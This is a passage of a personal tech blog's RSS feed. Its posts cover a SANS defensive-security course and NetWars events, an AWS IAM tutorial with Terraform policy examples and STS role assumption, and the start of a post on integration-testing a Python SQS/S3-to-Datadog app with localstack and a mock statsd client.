&lt;p>&lt;img src="kibana-onion.png" alt="kibana-onion">&lt;/p>
&lt;p>This really seems like an awesome set of features that can detect malicious attacks much better than my first setup with &lt;strong>ELK &amp;amp; Packetbeat&lt;/strong>. This is exactly what I was looking for while on that shared WLAN: some advanced visibility into network metadata. I&amp;rsquo;m glad I did not have to implement it all by hand after all &amp;hellip; :)&lt;/p>
&lt;h3 id="blue-team-project---next-next-level">Blue Team Project - Next Next Level&lt;/h3>
&lt;p>While looking around on the net for possible solutions to my issues, I stumbled upon this project from
&lt;a href="https://github.com/dtag-dev-sec/tpotce/tree/master/docker" target="_blank" rel="noopener">Telekom Security&lt;/a>&amp;lsquo;s GitHub page, which seemed like an even more advanced version of the Security Onion with various types of built-in honeypots that feed information to a Kibana dashboard. Sadly however, this is not possible to set up on the #SEC530 VM because the built-in installer does not support Xubuntu 16.04 and there were so many moving parts to the project that I did not dare to do it all by hand. For now I just keep it here as a reference, maybe in a future post I will describe it in more detail!&lt;/p>
&lt;h2 id="conclusion">Conclusion&lt;/h2>
&lt;p>As I already mentioned, this was my first SANS training and I could not be happier about the whole experience, despite the unfortunate situation with the global pandemic disrupting our onsite course. While I was initially a bit worried about the lack of &lt;code>station isolation&lt;/code> on the shared WLAN, I really enjoyed digging around the Internet for a solution to earn me some peace of mind. The knowledge and new skills I acquired in the domain of Defensible Security Architecture have been quite overwhelming, to say the least.&lt;/p>
&lt;p>I also enjoyed building new connections with the people who run these trainings and with my fellow SANS alumni. Taking part in the NetWars events that followed in March and April, it felt good to be part of such an incredible community.&lt;/p></description></item><item><title>SANS NetWars in March</title><link>https://flrnks.netlify.app/post/sans-netwars/</link><pubDate>Sat, 04 Apr 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/sans-netwars/</guid><description>&lt;p>This past month of March was quite eventful, to say the least, with all the news of this pandemic shaking many different segments of our globalised society. It&amp;rsquo;s virtually impossible to escape the constant flow of news in the media. While March was practically defined by the continuously evolving story of the virus, I wanted to write a new blog post about a different topic that also greatly impacted this month for me: a live SANS course I attended in Prague and some online CTF challenges organised by SANS and the Counter Hack team.&lt;/p>
&lt;h2 id="sans-prague-march-2020">SANS Prague March 2020&lt;/h2>
&lt;p>I still remember how excited I was when I learnt that my employer would sponsor my attendance of a six-day-long
&lt;a href="https://www.sans.org/event/prague-march-2020" target="_blank" rel="noopener">SANS&lt;/a> course in March, taking place in the city where I currently live and work. I was eagerly looking forward to it, scheduled for the 9th to the 14th of March.&lt;/p>
&lt;p>&lt;img src="sans_prague.jpg" alt="SANS-Prague">&lt;/p>
&lt;p>The course was arranged in a very nice hotel in the Prague 5 district, and we were hosted by very friendly SANS staff that included some world-class teachers. I really liked how well they organised everything and tried to spoil us with good food. There were actually several courses running in parallel; my course, the
&lt;a href="https://www.sans.org/course/defensible-security-architecture-and-engineering" target="_blank" rel="noopener">SEC530&lt;/a>, a.k.a. &lt;strong>Defensible Security Architecture and Engineering&lt;/strong>, was taught by Ryan Nicholson, who did a great job during the first three days.&lt;/p>
&lt;p>Sadly however, on Wednesday (11th of March) we were instructed to go home due to the growing risk of contracting the COVID-19 virus. All was not lost, because the SANS team did their best to convert the whole class to an online CyberCast while the course was in progress. So from the next day onward, we continued remotely with new instructors who jumped in while Ryan was on his way back to the States. Initially we thought he would continue hosting the CyberCast from his hotel room, but eventually we got to know two new SANS instructors, Greg Scheidel and Ismael Valenzuela, who took turns teaching the rest of the course material and then hosting the NetWars event for us.&lt;/p>
&lt;h2 id="sans-netwars">SANS NetWars&lt;/h2>
&lt;p>While the raw educational content of SEC530 was great, I most enjoyed the last day of the course, when we got to take part in a private NetWars challenge hosted just for the participants of the course, about 10-15 people. I had some initial ideas about what NetWars was all about, thanks to numerous cleverly placed banners in the Holiday Hack Challenges from previous years, but I had never actually participated in one before, so it was a completely new experience for me. And I immediately loved it so much that when it was over I knew I wanted more!&lt;/p>
&lt;!-- ![SEC530-Coin](https://pbs.twimg.com/media/D9g4yNrWwAE8H8h?format=jpg&amp;name=4096x4096) -->
&lt;p>So you can imagine how excited I was when I learnt that SANS was going to offer a bunch of
&lt;a href="https://www.sans.org/blog/and-now-for-something-awesome-sans-launches-new-series-of-worldwide-capture-the-flag-cyber-events/" target="_blank" rel="noopener">free NetWars events&lt;/a> for SANS alumni, with some special events open to the whole world to take part in! First one was a two-day Core NetWars Tournament, first of its kind, organised completely online via CyberCast from 19th to 20th of March. Due to timezone differences, it lasted until 2 am on both days, but I loved every second of it! While I had no high hopes of winning, I was surprised how well I did, eventually finishing as 12th amongst the first time NetWars players.&lt;/p>
&lt;!-- ![Core-NetWars](core-netwars.jpg) -->
&lt;p>Next up was the Mini NetWars Mission 1, also first of its kind, from 2nd till 3rd of April. This was a bit different from Core NetWars, as we did not have to solve the challenges in a virtualised OS environment, instead we relied solely on the browser, very similar to how the Holiday Hack environment works, which was already quite familiar to me!&lt;/p>
&lt;p>This time many more people signed up, as registration was not limited to just SANS alumni but open to the public. Eventually we were more than 500 people competing! This time I managed to solve all of the objectives and obtained the maximum score of 92 which qualified me as a
&lt;a href="https://www.counterhackchallenges.com/winners" target="_blank" rel="noopener">winner&lt;/a>. My final placement on the ranking was somewhere around 50th, as I took a number of hints and was a bit slower than others. Nevertheless, I was still amazed by how far I have come. By the way, this is my battle station setup, which won me some cool SANS swag on
&lt;a href="https://twitter.com/SANSInstitute/status/1246150677602226176" target="_blank" rel="noopener">Twitter&lt;/a> :)&lt;/p>
&lt;p>&lt;img src="mini-netwars.jpg" alt="Mini-NetWars">&lt;/p>
&lt;h2 id="conclusion">CONCLUSION&lt;/h2>
&lt;p>All in all, I cannot thank SANS enough for hosting these alumni NetWars events, some completely free for the whole cyber security community. I am probably not alone in feeling that they did an amazing service for us all, most of whom were stuck at home due to social distancing and quarantine measures implemented worldwide. This month was surely made a bit special for me, so big thanks to SANS and the Counter Hack team for all their efforts!&lt;/p>
&lt;p>&lt;strong>P.S.:&lt;/strong> A very, very cool Spotify playlist, which works wonders during such CTF contests, is available via this
&lt;a href="https://open.spotify.com/playlist/2KwHJlC1x117sXWR0CKZWW?si=H3V76HhzSwi_Bu5Wqut7qQ" target="_blank" rel="noopener">link&lt;/a>. I cannot take credit for it, it belongs to Bryce Galbraith who moderated these two previous NetWars events and was kind enough to share his playlist with us.&lt;/p></description></item><item><title>Identity &amp; Access Management</title><link>https://flrnks.netlify.app/post/aws-iam/</link><pubDate>Mon, 03 Feb 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/aws-iam/</guid><description>&lt;h2 id="introduction">INTRODUCTION&lt;/h2>
&lt;p>In this post I show how the Identity and Access Management service in the AWS Public Cloud works to secure resources and workloads. It is a very important topic, because it underpins all of the security that is needed for hosting one&amp;rsquo;s resources in the public cloud.&lt;/p>
&lt;p>At the end of the day, the cloud is just a concept that offers a convenient illusion of dedicated resources; in reality it is all processes running on someone else&amp;rsquo;s hardware, so one has to be absolutely sure about security before trusting it with business-critical workloads.&lt;/p>
&lt;p>It is enough to do a quick google search for
&lt;a href="https://www.google.com/search?q=unsecured%20s3%20bucket" target="_blank" rel="noopener">unsecured s3 bucket&lt;/a> to see plenty of examples of administrators failing to properly harden and configure their AWS resources, and falling victim to accidental disclosure of often business-critical information.&lt;/p>
&lt;p>
&lt;a href="https://docs.aws.amazon.com/iam/?id=docs_gateway" target="_blank" rel="noopener">IAM&lt;/a> exists in the realm of AWS Cloud as a standalone service, providing various ways in which access to resources and workloads can be restricted. For example, if someone has an S3 bucket for storing arbitrary data, one can use IAM policies to restrict access to data stored in the bucket based on various criteria such as user identity, connection source IP, VPC environment and so on. S3 is a convenient service to demonstrate IAM capabilities, because it is very easy to grasp the result of restrictions: access to files in an S3 bucket is either granted or denied.&lt;/p>
&lt;h2 id="how-it-works">HOW IT WORKS&lt;/h2>
&lt;p>In order to illustrate how IAM works, I created a Python Lambda function (Lambda is an AWS service offering serverless functions) and implemented a routine that tries to access some data stored in a particular S3 bucket. By default the Lambda starts running with an
&lt;a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html" target="_blank" rel="noopener">IAM role&lt;/a> that has only read-only permission to the bucket. This is verified by making an API call with the
&lt;a href="https://boto3.amazonaws.com/v1/documentation/api/latest/index.html" target="_blank" rel="noopener">boto3&lt;/a> package, which returns without any error. Next the Lambda tries to write some new data to the bucket, but this fails because the IAM role is not equipped with Write permission to the S3 bucket.&lt;/p>
&lt;p>To mitigate this problem, I use boto3 to make an AWS Secure Token Service (
&lt;a href="https://docs.aws.amazon.com/STS/latest/APIReference/Welcome.html" target="_blank" rel="noopener">STS&lt;/a>) call and assume a new role which is equipped with the necessary read-write access. Using this new role the program demonstrates that it can write to the bucket as expected. Below is a sample output of the Lambda Function in action:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yml" data-lang="yml">===&lt;span class="w"> &lt;/span>Checking&lt;span class="w"> &lt;/span>IAM&lt;span class="w"> &lt;/span>Identity&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">ARN&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>arn&lt;span class="p">:&lt;/span>aws&lt;span class="p">:&lt;/span>sts&lt;span class="p">::&lt;/span>ACCOUNT_ID&lt;span class="p">:&lt;/span>assumed-role/Base-Lambda-Custom-Role/lambda&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>===&lt;span class="w"> &lt;/span>Testing&lt;span class="w"> &lt;/span>Read&lt;span class="w"> &lt;/span>access&lt;span class="w"> &lt;/span>to&lt;span class="w"> &lt;/span>S3&lt;span class="w"> &lt;/span>file&lt;span class="w"> &lt;/span>in&lt;span class="w"> &lt;/span>bucket&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>{&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">&amp;#34;field1&amp;#34;: &lt;/span>&lt;span class="kc">true&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">&amp;#34;field2&amp;#34;: &lt;/span>&lt;span class="m">1.&lt;/span>4107917E7&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>}&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>===&lt;span class="w"> &lt;/span>Testing&lt;span class="w"> &lt;/span>Write&lt;span class="w"> &lt;/span>access&lt;span class="w"> &lt;/span>to&lt;span class="w"> &lt;/span>S3&lt;span class="w"> &lt;/span>bucket&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">Error&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>AccessDenied!&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>===&lt;span class="w"> &lt;/span>Assumed&lt;span class="w"> &lt;/span>New&lt;span class="w"> &lt;/span>IAM&lt;span class="w"> &lt;/span>Identity&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>&lt;span class="k">ARN&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>arn&lt;span class="p">:&lt;/span>aws&lt;span class="p">:&lt;/span>sts&lt;span class="p">::&lt;/span>ACCOUNT_ID&lt;span class="p">:&lt;/span>assumed-role/S3-RW-Role/lambda&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>===&lt;span class="w"> &lt;/span>Testing&lt;span class="w"> &lt;/span>Write&lt;span class="w"> &lt;/span>access&lt;span class="w"> &lt;/span>to&lt;span class="w"> &lt;/span>S3&lt;span class="w"> &lt;/span>bucket&lt;span class="w"> &lt;/span>(using&lt;span class="w"> &lt;/span>new&lt;span class="w"> &lt;/span>role)&lt;span class="w"> &lt;/span>===&lt;span class="w">
&lt;/span>&lt;span class="w">&lt;/span>...&lt;span class="w"> &lt;/span>file&lt;span class="w"> &lt;/span>was&lt;span class="w"> &lt;/span>written&lt;span class="w"> &lt;/span>successfully!&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>To get a better understanding how this all worked in code, feel free to check out the source code repository in Github (
&lt;a href="https://github.com/florianakos/aws-iam-exercise" target="_blank" rel="noopener">link&lt;/a>). Because I am a big fan of Terraform, I defined all resources (S3, IAM, Lambda) in code which makes it very simple and straightforward to deploy and test the code if you feel like!&lt;/p>
&lt;h2 id="advanced-iam">ADVANCED IAM&lt;/h2>
&lt;p>Besides providing the basic functionality to restrict access to resources based on user identity, there are some cool, more advanced features of AWS IAM that I wanted to touch upon. First, to show how simple it is to give read-only permissions to a bucket for an IAM role:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">data &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_ro_access_policy_document&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
statement &lt;span class="o">{&lt;/span>
&lt;span class="nv">effect&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Allow&amp;#34;&lt;/span>
&lt;span class="nv">actions&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span>
&lt;span class="s2">&amp;#34;s3:GetObject&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;s3:ListBucket&amp;#34;&lt;/span>,
&lt;span class="o">]&lt;/span>
&lt;span class="nv">resources&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span>
&lt;span class="s2">&amp;#34;arn:aws:s3:::my-bucket&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;arn:aws:s3:::my-bucket/*&amp;#34;&lt;/span>
&lt;span class="o">]&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
resource &lt;span class="s2">&amp;#34;aws_iam_policy&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_ro_access_policy&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="nv">name&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;S3-ReadOnly-Access&amp;#34;&lt;/span>
&lt;span class="nv">policy&lt;/span> &lt;span class="o">=&lt;/span> data.aws_iam_policy_document.s3_ro_access_policy_document.json
&lt;span class="o">}&lt;/span>
resource &lt;span class="s2">&amp;#34;aws_iam_role_policy_attachment&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;Allow_S3_ReadOnly_Access&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="nv">role&lt;/span> &lt;span class="o">=&lt;/span> aws_iam_role.aws_custom_role_for_lambda.name
&lt;span class="nv">policy_arn&lt;/span> &lt;span class="o">=&lt;/span> aws_iam_policy.s3_ro_access_policy.arn
&lt;span class="o">}&lt;/span>
resource &lt;span class="s2">&amp;#34;aws_iam_role&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;aws_s3_readwrite_role&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="nv">name&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;S3-RW-Role&amp;#34;&lt;/span>
&lt;span class="nv">description&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Role to allow full RW to bucket&amp;#34;&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Full source code on
&lt;a href="https://github.com/florianakos/aws-iam-exercise/blob/master/terraform/s3.tf" target="_blank" rel="noopener">GitHub&lt;/a>.&lt;/p>
&lt;p>With this short Terraform snippet, I created a role and attached an IAM policy to it that grants read-only access to the &lt;code>my-bucket&lt;/code> resource in S3. To spice this up a bit, it is possible to add extra restrictions based on various elements of the request context, for example restricting access by source IP:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">data &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_ro_access_policy_document&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
statement &lt;span class="o">{&lt;/span>
&lt;span class="nv">effect&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Deny&amp;#34;&lt;/span>
&lt;span class="nv">actions&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span>
&lt;span class="s2">&amp;#34;s3:*&amp;#34;&lt;/span>
&lt;span class="o">]&lt;/span>
&lt;span class="nv">resources&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;*&amp;#34;&lt;/span>&lt;span class="o">]&lt;/span>
condition &lt;span class="o">{&lt;/span>
&lt;span class="nb">test&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;IpAddress&amp;#34;&lt;/span>
&lt;span class="nv">variable&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;aws:SourceIp&amp;#34;&lt;/span>
&lt;span class="nv">values&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;192.168.2.0/24&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now, even if the user making the request to S3 has valid credentials, connecting from a subnet outside the one specified above means the request will be &lt;strong>denied&lt;/strong>! This can be very useful when, for example, access to resources should only be possible from within a corporate network with a specific CIDR range.&lt;/p>
&lt;p>One small issue with this source-IP restriction is that it can break certain AWS services that act on behalf of a principal/user. With AWS Athena, for example, running a query on data stored in S3 means Athena makes S3 API requests on behalf of the user who initiated the query; those requests arrive from an Amazon-owned CIDR range, so they will fail. An extra condition can be added to remediate this issue:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">data &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_ro_access_policy_document&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
statement &lt;span class="o">{&lt;/span>
&lt;span class="nv">effect&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Deny&amp;#34;&lt;/span>
&lt;span class="nv">actions&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span>
&lt;span class="s2">&amp;#34;s3:*&amp;#34;&lt;/span>
&lt;span class="o">]&lt;/span>
&lt;span class="nv">resources&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;*&amp;#34;&lt;/span>&lt;span class="o">]&lt;/span>
condition &lt;span class="o">{&lt;/span>
&lt;span class="nb">test&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;IpAddress&amp;#34;&lt;/span>
&lt;span class="nv">variable&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;aws:SourceIp&amp;#34;&lt;/span>
&lt;span class="nv">values&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;192.168.2.0/24&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
&lt;span class="o">}&lt;/span>
condition &lt;span class="o">{&lt;/span>
&lt;span class="nb">test&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Bool&amp;#34;&lt;/span>
&lt;span class="nv">variable&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;aws:ViaAWSService&amp;#34;&lt;/span>
&lt;span class="nv">values&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;false&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The &lt;code>aws:ViaAWSService = false&lt;/code> condition ensures that the Deny only takes effect when the request does not come from an AWS service endpoint acting on the principal&amp;rsquo;s behalf. For additional condition keys that can be used to grant or deny access, please consult the AWS
&lt;a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html" target="_blank" rel="noopener">documentation&lt;/a>.&lt;/p>
&lt;h2 id="conclusion">CONCLUSION&lt;/h2>
&lt;p>In this post I demonstrated how to use the boto3 python package to make AWS IAM and STS calls to access resources in the AWS cloud protected by IAM policies. I also discussed some advanced features of AWS IAM that can help you implement more granular IAM policies and access rights. The linked repository also contains an example which may be run locally and does not need the Lambda function to be created (it still, however, requires the Terraform resources to be deployed).&lt;/p></description></item><item><title>Cloud Service Testing</title><link>https://flrnks.netlify.app/post/python-aws-datadog-testing/</link><pubDate>Fri, 17 Jan 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/python-aws-datadog-testing/</guid><description>&lt;p>In this blog post I discuss a recent project I worked on to practice my skills related to AWS, Python and Datadog. It includes topics such as integration testing using &lt;strong>pytest&lt;/strong> and &lt;strong>localstack&lt;/strong>; running Continuous Integration via &lt;strong>Travis-CI&lt;/strong> and infrastructure as code using &lt;strong>Terraform&lt;/strong>.&lt;/p>
&lt;h2 id="intro">Intro&lt;/h2>
&lt;p>For the sake of this blog post, let&amp;rsquo;s assume that a periodic job runs somewhere in the Cloud, outside the context of this application, and generates a file with some meta-data about the job itself. This data consists mostly of numerical values, such as the number of images used to train an ML model, the number of files processed, etc. This part is depicted in the diagram below as a dummy Lambda function that periodically uploads a metadata file with random numerical values to an S3 bucket.&lt;/p>
&lt;p>&lt;img src="img/arch.png" alt="Architecture">&lt;/p>
&lt;p>When this file is uploaded, an event notification is sent to the message queue. The goal of the Python application is to periodically drain these messages from the queue. When the application runs, it fetches the S3 file referenced in each SQS message, parses the file&amp;rsquo;s contents and submits the numerical metrics to DataDog for the purpose of visualisation and alerting.&lt;/p>
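&lt;p>The per-message work described above can be sketched as follows; the &lt;code>Records&lt;/code> layout is the standard S3 event-notification format, while &lt;code>extract_object_refs&lt;/code> and the bucket/key names are hypothetical:&lt;/p>

```python
import json

# Hypothetical helper: pull (bucket, key) pairs out of an S3 event
# notification, which arrives as the JSON body of an SQS message.
def extract_object_refs(message_body: str):
    event = json.loads(message_body)
    return [
        (rec["s3"]["bucket"]["name"], rec["s3"]["object"]["key"])
        for rec in event.get("Records", [])
    ]

body = json.dumps({"Records": [
    {"s3": {"bucket": {"name": "cloud-job-results"},
            "object": {"key": "runs/2020-01-17/meta.json"}}}
]})
print(extract_object_refs(body))  # [('cloud-job-results', 'runs/2020-01-17/meta.json')]
```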
&lt;h2 id="testing">Testing&lt;/h2>
&lt;p>Since the application interacts with two different APIs (AWS &amp;amp; Datadog), I figured it was a good idea to create integration tests that can be run easily via some free CI service (e.g.: Travis-CI.org). When writing the integration tests, I opted to create a simple mock class for testing the interaction with the Datadog API, and chose to rely on &lt;strong>localstack&lt;/strong> for testing the interaction with the AWS API.&lt;/p>
&lt;p>Thanks to &lt;strong>localstack&lt;/strong> I could skip creating real resources in AWS and instead use free fake resources in a Docker container that mimic the real AWS API almost perfectly. The AWS SDK for Python, &lt;code>boto3&lt;/code>, is very easy to reconfigure to connect to the fake resources in &lt;strong>localstack&lt;/strong> via the &lt;code>endpoint_url=&lt;/code> parameter.&lt;/p>
&lt;p>In the following sections I go through different phases of the project:&lt;/p>
&lt;ol>
&lt;li>coding the python app&lt;/li>
&lt;li>mocking Datadog statsd client&lt;/li>
&lt;li>setting up AWS resources in localstack&lt;/li>
&lt;li>creating integration tests&lt;/li>
&lt;li>Travis-CI integration&lt;/li>
&lt;li>running the datadog-agent locally&lt;/li>
&lt;li>setting up real AWS resources&lt;/li>
&lt;li>live testing&lt;/li>
&lt;/ol>
&lt;h3 id="-coding-the-python-app-">~ Coding the python app ~&lt;/h3>
&lt;p>The
&lt;a href="https://github.com/florianakos/python-testing/blob/master/app/submitter.py" target="_blank" rel="noopener">code&lt;/a> is mainly composed of two Python classes with methods to interact with AWS and DataDog. The &lt;strong>CloudResourceHandler&lt;/strong> class has methods to interact with S3 and SQS, which can be replaced in integration-tests with preconfigured &lt;code>boto3&lt;/code> clients for &lt;strong>localstack&lt;/strong>.&lt;/p>
&lt;p>The &lt;strong>MetricSubmitter&lt;/strong> class uses the &lt;strong>CloudResourceHandler&lt;/strong> internally and offers some additional methods for sending metrics to DataDog. Internally it uses statsd from the &lt;code>datadog&lt;/code> python
&lt;a href="https://pypi.org/project/datadog/" target="_blank" rel="noopener">package&lt;/a>, which can be replaced via dependency injection in integration tests with a mock statsd class that I created to test its interaction with the Datadog API.&lt;/p>
&lt;p>To connect to the real AWS &amp;amp; Datadog APIs (via a preconfigured local datadog-agent), two environment variables need to be specified at run-time:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>STATSD_HOST&lt;/strong> set to &lt;code>localhost&lt;/code>&lt;/li>
&lt;li>&lt;strong>SQS_QUEUE_URL&lt;/strong> set to the URL of the Queue&lt;/li>
&lt;/ul>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="n">os&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">environ&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;STATSD_HOST&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;localhost&amp;#39;&lt;/span>
&lt;span class="n">os&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">environ&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;SQS_QUEUE_URL&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;https://sqs.eu-central-1.amazonaws.com/????????????/cloud-job-results-queue&amp;#39;&lt;/span>
&lt;span class="n">session&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">boto3&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">Session&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">profile_name&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;profile-name&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">MetricSubmitter&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">statsd&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">datadog_statsd&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="n">sqs_client&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">session&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">client&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;sqs&amp;#39;&lt;/span>&lt;span class="p">),&lt;/span>
&lt;span class="n">s3_client&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">session&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">client&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;s3&amp;#39;&lt;/span>&lt;span class="p">))&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">run&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In addition, it also requires a preconfigured AWS profile in &lt;code>~/.aws/credentials&lt;/code> which is necessary for &lt;strong>boto3&lt;/strong> to authenticate to AWS:&lt;/p>
&lt;pre>&lt;code class="language-console" data-lang="console">[profile-name]
aws_access_key_id = XXXXXXXXXXXXXXX
aws_secret_access_key = XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
region = eu-central-1
&lt;/code>&lt;/pre>&lt;p>But before running it, let&amp;rsquo;s set up some integration tests!&lt;/p>
&lt;h3 id="-mocking-datadog-statsd-client-">~ Mocking Datadog statsd client ~&lt;/h3>
&lt;p>In truth, the application does not interact directly with the Datadog API, but rather it uses &lt;strong>statsd&lt;/strong> from the &lt;code>datadog&lt;/code> python package, which interacts with the local &lt;code>datadog-agent&lt;/code>, which in turn forwards metrics and events to the Datadog API.&lt;/p>
&lt;p>To test this flow that relies on &lt;code>statsd&lt;/code>, I created a class called &lt;strong>DataDogStatsDHelper&lt;/strong>. This class has two methods (&lt;strong>gauge/event&lt;/strong>) with signatures identical to the real methods of the &lt;code>statsd&lt;/code> client from the official &lt;code>datadog&lt;/code> package. However, the mock methods do not send anything to the &lt;code>datadog-agent&lt;/code>; instead, they accumulate the values they were passed in local class variables:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="k">class&lt;/span> &lt;span class="nc">DataDogStatsDHelper&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="n">event_title&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">event_text&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">event_alert_type&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">event_tags&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="bp">None&lt;/span>
&lt;span class="n">event_counter&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>
